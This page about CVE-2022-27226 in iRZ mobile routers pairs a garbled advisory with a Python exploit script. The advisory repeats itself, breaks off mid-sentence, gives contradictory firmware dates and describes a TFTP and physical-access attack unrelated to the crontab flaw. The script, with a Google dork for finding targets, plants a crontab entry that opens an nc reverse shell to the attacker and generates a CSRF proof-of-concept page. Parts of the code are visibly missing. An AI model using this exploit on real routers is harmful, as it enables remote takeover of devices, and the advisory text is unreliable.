CVE-2022-27226 An issue was found in iRZ Mobile routers' /api/crontab that allows a threat actor to create a crontab entry.

This issue affects all iRZ router models.

iRZ Mobile routers running firmware up to and including 1.1.8 (released on 2019-01-04) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.7 (released on 2018-12-16) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.6 (released on 2018-11-01) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.5 (released on 2018-09-20) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.4 (released on 2018-06-05) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.3 (released on 2018-03-22) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.2 (released on 2017-12-05) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1.1 (released on 2017-08-21) are vulnerable. iRZ Mobile routers running firmware up to and including 1.1 (released on 2017-06-05) are vulnerable. iRZ Mobile routers running firmware up to and including 1.0.9 (released on 2017-03-15) are vulnerable. iRZ Mobile routers running firmware up to and including

iRZ Mobile Routers Running Firmware 1.0.9

The following firmware versions are affected:
1.0.9 (released on 2017-03-15)
1.0.8 (released on 2018-01-04)
1.0.7 (released on 2018-12-16)
1.0.6 (released on 2018-11-01)
1.0.5 (released on 2018-09-20)
1.0.4 (released on 2018-06-05)
1.0.3 (released on 2018-03-22)

iRZ Mobile Firmware Vulnerability Summary

An attacker with physical access to a vulnerable iRZ router can exploit this vulnerability by creating a malicious configuration file on the iRZ router and then rebooting the router to load it.
Once the malicious configuration file is loaded, the modem will be rebooted, which will cause it to contact an attacker-controlled IP address, providing unauthenticated access to the host. If no authentication is configured on either the modem or interface of the attacking host, an attacker can take complete control of this device.
The following actions are recommended:
Upgrade all firmware using a different mechanism than through TFTP. This can be done automatically or manually.
Disable TFTP access altogether.

What is iRZ? iRZ is a manufacturer of routers and mobile phones. iRZ routers are used in both residential and business settings. The company develops new devices regularly, with many products launched every year. They have a wide range of top-quality products that meet the needs of all users.


# Exploit Title: iRZ Mobile Router - CSRF to RCE
# Google Dork: intitle:"iRZ Mobile Router"
# Date: 2022-03-18
# Exploit Author: Stephen Chavez & Robert Willis
# Vendor Homepage:
# Software Link:
# Version: Routers through 2022-03-16
# Tested on: RU21, RU21w, RL21, RU41, RL01
# CVE : CVE-2022-27226

import os
import requests
import json
import subprocess

option = "0"

def main():
    print("# Welcome to IRZ CSRF to RCE Exploit - version 1.0 #")
    print("## by RedragonX of WHG & rej_ex of SAKURA SAMURAI ##")
    print("1. Post Authentication RCE (Needs Credentials)")
    print("2. CSRF to RCE (No Credentials)")

def runit():
    option = input("Select an option: ")
    if option == "1":
    elif option == "2":
        print("You must select '1' or '2'. Exiting.")

def exploit1():
    print("## Running Post Auth RCE exploit")
    router_ip = input("## Enter the router ip to exploit: ")
    router_port = int(
        input("## Enter the victim router web page port (default is 80): ") or "80")

    router_user = input("## Enter the username for the router login: ")
    router_pass = input("## Enter the password for the router login: ")

    LHOST = input("## Enter the LHOST for the router reverse shell: ")
    LPORT = input("## Enter the LPORT for the router reverse shell: ")

    router_url = f'http://{router_ip}:{router_port}'

    nc1_str = f'Start a listener with the following command: nc -lvp {LPORT}'

    input(nc1_str + "\n\nPress enter once you do")

    send_json_payload(router_url, router_user, router_pass, LHOST, LPORT)

def send_json_payload(router_url, router_user, router_pass, lhost_ip, lhost_port):

    intro = f'Sending the payload to {router_url}\n'
    payload_str = '{"tasks":[{"enable":true,"minutes":"*","hours":"*","days":"*","months":"*","weekdays":"*","command":"rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc ' + \
        f'{lhost_ip} {lhost_port} ' + \
        '>/tmp/f"}],"_board":{"name":"RL21","platform":"irz_mt02","time":"Wed Mar 16 16:43:20 UTC 2022"}}'

    payload_json = json.loads(payload_str)

    s = requests.Session()

    s.auth = (router_user, router_pass)

        {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36"})
    s.headers.update({"X-Requested-With": "XMLHttpRequest"})
    s.headers.update({"Origin": router_url})
    s.headers.update({"Referer": router_url}) + "/api/crontab", json=payload_json)

    exploit_str = f'rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc {lhost_ip} 443 >/tmp/f'

        "Request sent! You may have to wait about 2 minutes to get a shell. \nFirst shell will die due to crontab job. Start a new listener on a new port [e.g. 443], and run the following command: " + exploit_str)
    print("To fix TTY: type telnet in the shell")

def exploit2():

    print("## Running CSRF to RCE exploit")
    router_ip = input("## Enter the router ip to exploit: ")
    router_port = int(
        input("## Enter the victim router web page port (default is 80): ") or "80")

    LHOST = input("## Enter the LHOST for the router reverse shell: ")
    LPORT = input("## Enter the LPORT for the router reverse shell: ")

    load_csrf_poc_file(router_ip, router_port, LHOST, LPORT)

def load_csrf_poc_file(router_ip, router_port, lhost_ip, lhost_port):

    file_path = os.path.dirname(__file__) + os.sep + "poc.template.html"

    if os.path.isfile(file_path):
        with open(file_path) as poc_file:
            original_poc_data_str =

            new_html = original_poc_data_str.replace("{router_ip}", router_ip)
            new_html = new_html.replace(
                "{router_port}", str(router_port))

            lhost_split_arr = lhost_ip.split(".")

            if len(lhost_split_arr) == 4:

                new_html = new_html.replace(
                    "{lhost_ip_octect_1}", lhost_split_arr[0])

                new_html = new_html.replace(
                    "{lhost_ip_octect_2}", lhost_split_arr[1])

                new_html = new_html.replace(
                    "{lhost_ip_octect_3}", lhost_split_arr[2])
                new_html = new_html.replace(
                    "{lhost_ip_octect_4}", lhost_split_arr[3])

                new_html = new_html.replace(
                    "{lhost_port}", lhost_port)

                new_file_path = os.path.dirname(
                    __file__) + os.sep + ""
                    with open(new_file_path, 'w') as new_file:

                        f'New file written to {new_file_path}. Host this file')
                except FileNotFoundError:
                    print("You had an error writing to the file, doesn't exist.")
                print(f'{lhost_ip} is not a proper IPV4 address.')

        print(f'{file_path} not found')



Published on: 03/19/2022 04:15:00 UTC
Last modified on: 03/28/2022 19:13:00 UTC
